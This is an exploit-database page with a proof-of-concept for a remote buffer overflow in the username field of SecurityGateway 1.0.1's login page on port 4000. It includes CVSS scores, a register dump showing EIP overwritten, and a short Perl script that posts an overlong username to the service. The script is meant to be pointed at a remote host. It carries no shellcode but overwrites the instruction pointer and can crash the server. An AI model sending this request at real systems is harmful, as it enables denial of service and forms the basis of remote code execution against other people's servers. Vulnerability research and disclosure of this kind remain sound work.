SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC

2008.09.26
Credit: securfrog
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

################################################################################################################## # SecurityGateway 1.0.1 Remote Buffer Overflow ( username) # Vendor: http://www.altn.com/ # risk : critical #SecurityGateway open port 4000 for remote administration/managment, EIP get owned when the username field is filled with 720 chars # #eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000 #eip=63636363 esp=042ce910 ebp=042ce930 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #63636363 ?? ??? # # Replace http://127.0.0.1:4000/ with your remote host. use LWP::UserAgent; $connect = LWP::UserAgent->new; my $payload1 ="a" x 236; my $payload2 ="b" x 480; my $eip_owned = "c" x 4; print "SecurityGateway Remote BoF exploit by securfrog.\n\n"; my $req = HTTP::Request->new(POST => 'http://127.0.0.1:4000/SecurityGateway.dll'); $req->content_type('application/x-www-form-urlencoded'); $req->content('RequestedPage=login&username='.$payload2.$eip_owned.$payload1.'&passwd=world&lang=en&logon=Sign+In'); my $res = $connect->request($req); print $res->as_string; print "Exploit successfull\n";

References:

http://www.milw0rm.com/exploits/5718
http://secunia.com/advisories/30497
http://files.altn.com/securitygateway/release/relnotes_en.htm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top